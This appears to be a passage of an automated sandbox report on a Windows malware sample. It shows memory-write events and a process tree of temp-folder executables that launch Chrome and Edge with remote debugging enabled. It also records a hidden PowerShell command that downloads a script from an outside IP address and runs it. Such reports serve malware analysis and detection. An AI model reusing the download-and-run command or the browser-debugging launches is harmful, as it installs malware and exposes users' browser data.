PID 3124 wrote to memory of 4504 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 4504 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3124 wrote to memory of 1560 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe

"C:\Users\Admin\AppData\Local\Temp\81f74729d5804f8d12d6b03e9857f8598a2658f4affaf7179c17d183d11dcf7d.exe"

C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe

"C:\Users\Admin\AppData\Local\Temp\UVR9XS062SFG8N10I3ILODHN4VDMVRY.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe

"C:\Users\Admin\AppData\Local\Temp\10109440101\ILqcVeT.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9ac31cc40,0x7ff9ac31cc4c,0x7ff9ac31cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2176,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2464 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3216 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4176,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4188 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4604,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4632 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3200,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4260 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4488,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4552 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3832,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4924 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5024,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4824 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4924 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5144,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5140 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4760,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5236 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5356,i,5419529248705497581,7631215425107052812,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5344 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe

"C:\Users\Admin\AppData\Local\Temp\10109490101\rXOl0pp.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9ac3246f8,0x7ff9ac324708,0x7ff9ac324718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2172,2608537558221568348,5947771980609798483,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F9B2.tmp\F9B3.tmp\F9B4.bat C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff99686cc40,0x7ff99686cc4c,0x7ff99686cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2028,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2024 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1832,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2084 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1620,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3224 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4460,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4464 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4656,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4696 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4648,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4704 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4872,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4988 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6016 -ip 6016

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 788

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4944,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5160 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5360,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5372 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5160,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5288 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5388,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5500 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5576,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5572 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5416,i,11582998374419163841,9096564643315106918,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5552 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5764 -ip 5764

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5764 -s 792

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9914e46f8,0x7ff9914e4708,0x7ff9914e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8541805074617763421,13249142319222219787,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

